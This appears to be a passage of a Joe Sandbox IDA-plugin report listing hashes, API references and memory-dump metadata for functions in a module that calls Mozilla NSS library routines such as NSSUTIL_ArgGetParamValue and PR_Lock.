                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5dd8c34108c615ff1ff538074e3556280e997adeaa525c0163f62e646eb98be
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A71AB70A182009BDB44CF28D890BABBBF5FF89304F15CA19F99997251D730A986CBD1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CEBEE3D
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Alloc_ArenaUtil
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2062749931-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 30133f6ddd0710099f99a29cd489c3f1bcfc431d2b380d807c9cc56a5237739e
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA71E272E01B018FD718CF59DA8167AB7F2AF88308F24466DE856A7B91D770E901CBD1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6CDE6013
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: strcmp
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1004003707-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1f435471368f5678e0f2f15c165019b78f0d857bbe1be872ac00ca5c170d248f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3e5bf40820baae9124ccddb946ef615e7ebfa0ebaeaf71cf5009daa73cb968a9
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f435471368f5678e0f2f15c165019b78f0d857bbe1be872ac00ca5c170d248f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64C10670B0461ACBDB05CF15C8907AEB7F2AF4D358F288169DAA5D7B62D731E842C790
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID: winUnlockReadLock
                                                                                                                                                                                                                                                                                                                      • API String ID: 0-4244601998
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 89b58c1bfbbfc251559a55453ed158bbcde83289f4af32dcd55383560fd4c0e7
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0f61d8e9ec645c847c3de30eb5a6d5234db1d46d32c91f7c21cc2fddb5981aad
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89b58c1bfbbfc251559a55453ed158bbcde83289f4af32dcd55383560fd4c0e7
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1E12970A28341CFDB44DF28D58475ABBF0FF89318F158A5DE89997361E7309986CB82
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF75B90: PR_Lock.NSS3(00010000,?,00000000,?,6CE5DF9B), ref: 6CF75B9E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF75B90: PR_Unlock.NSS3 ref: 6CF75BEA
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6CF75E23,6CE5E154), ref: 6CF75EBF
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: LockUnlockmemset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1725470033-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 38dc3c4a3d02d749f1d619412e9dd1c82354421511f1048c5bbb96794cef62b5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E519D72E0021A8FDB18CF59D8815AEF7B2FF88314B19456ED815B7745D730A941CBA0
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f648251826f00cbb424818b3f8ad0af2c69d9ebec853fe32e5fa7d159f5f6a6b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f5f49f7f5746728bf669d3d1dcfefe01a47c5644697bcd66eb73946074f9e032
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f648251826f00cbb424818b3f8ad0af2c69d9ebec853fe32e5fa7d159f5f6a6b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3F14B71A012058FDB48CF69C490BAAB7B2BF89318F294168D8099F755DB39ED42CBD1
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                                                                                                                                      • Instruction ID: e86a52b836e032384d11164b9e62989422bd94c3bb283201a2e8ff652ff0244d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9D15733B046568BDB118E58C9853DA7B73AB96328F2D4329C8745B7C2C37AD906C3C2
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memcpy$strlen
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2619041689-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 94927828eac3031b368fe44b2523fdee5b58c375af9ae093c6cf50fd910716b1
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 117cabcae9ca4e1a2f62644fdc93c8bacda90f7eb0a27473cf3eeac9dec1d040
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94927828eac3031b368fe44b2523fdee5b58c375af9ae093c6cf50fd910716b1
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D717E71F006449FDB04DF69D880AAEBBF6BF98208F148429E808D7752EB74DD46C7A1
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f6deda46df4d6043d53fa5d4cf3504959f4ad33ef9937c309f94287380daa09f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d4fdb43f14ecbd6168ff01f5e730fb77c8b2f1c47e4ee409eb898cca045f4ae7
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6deda46df4d6043d53fa5d4cf3504959f4ad33ef9937c309f94287380daa09f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4211E232BA02098BD728CF14D88575AB7B5BF4631CF6442AAD8068FB41C776D8A2C7D1
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 297456294415a66adac99f3037a7578ee2d528935bc6ca6abf3260497c7016b9
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3aadc9ce137fec16ccf57cc1f28f9f2871c4aa12453b61259fdac952f25a7938
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 297456294415a66adac99f3037a7578ee2d528935bc6ca6abf3260497c7016b9
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB11BF75704215AFCB00DF19C880A6A77A2EF853A8F14806AD8198B711DBB1E8068BE0
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValue$Error
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2275178025-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: de27b0cefbc3696ab9b1dcdd8ce883da9f1d56c8e71c4eac3707410c42124471
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 11b93421c8fd50f115f04a93c9661516d96f8dd6b3a8789574d721c9358c3c52
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de27b0cefbc3696ab9b1dcdd8ce883da9f1d56c8e71c4eac3707410c42124471
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32F05E70E147598BCB50DF68C4916EAB7F4EF0A254F109619EC8AAB701EB70AAC4C7D1
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d9291f358c2e625ff94c6e7dbf1e59c69d23f1d5f0f9d43055346909f73c1423
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FE06D3A202064B7DB558E09C450BAA7399DF81719FA4907ACC5D9BA01DA73F80387C1
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6246b242c8c71fb699525d791a26bcd9934f2663106ec83639e78122701ffa62
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 181c05963f4f59a097d80d37f51fbae0970cfcb7e83a91eba63e6155c42b05b8
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6246b242c8c71fb699525d791a26bcd9934f2663106ec83639e78122701ffa62
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CC04838294608CFC744DA08E489AA53BB8AB096107040094EA028B721DA21F900CA80
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CEC5E08
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CEC5E3F
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CEC5E5C
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEC5E7E
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEC5E97
                                                                                                                                                                                                                                                                                                                      • PORT_Strdup_Util.NSS3(secmod.db), ref: 6CEC5EA5
                                                                                                                                                                                                                                                                                                                      • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CEC5EBB
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CEC5ECB
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CEC5EF0
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEC5F12
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CEC5F35
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CEC5F5B
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEC5F82
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CEC5FA3
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CEC5FB7
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CEC5FC4
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEC5FDB
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CEC5FE9
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEC5FFE
                                                                                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CEC600C
                                                                                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CEC6027
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CEC605A
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(6CF9AAF9,00000000), ref: 6CEC606A
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEC607C
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEC609A
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEC60B2
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEC60CE
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
